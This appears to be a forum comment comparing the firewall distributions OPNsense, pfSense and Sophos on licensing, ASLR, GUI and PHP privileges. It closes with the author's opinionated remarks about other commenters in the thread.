- Sophos phones home too much, is not open source.

OPNsense in comparison to pfSense:

- using better BSD, with ASLR (the only check I did so far)

- licensed under BSD 2-Clause, vs Apache 2.0

- nicer GUI :)

- not running PHP as a root user

Looks like OPNsense is true hacker's stuff, check this out for DNS over TLS: https://forum.opnsense.org/index.php?topic=8748.msg38928#msg...

What I learned from this submission:

- people who start with their credentials, 'I'm experienced ...', make the least sense.

- people who use the word 'FUD' are actually trying to shut down a topic that is sensitive for them.
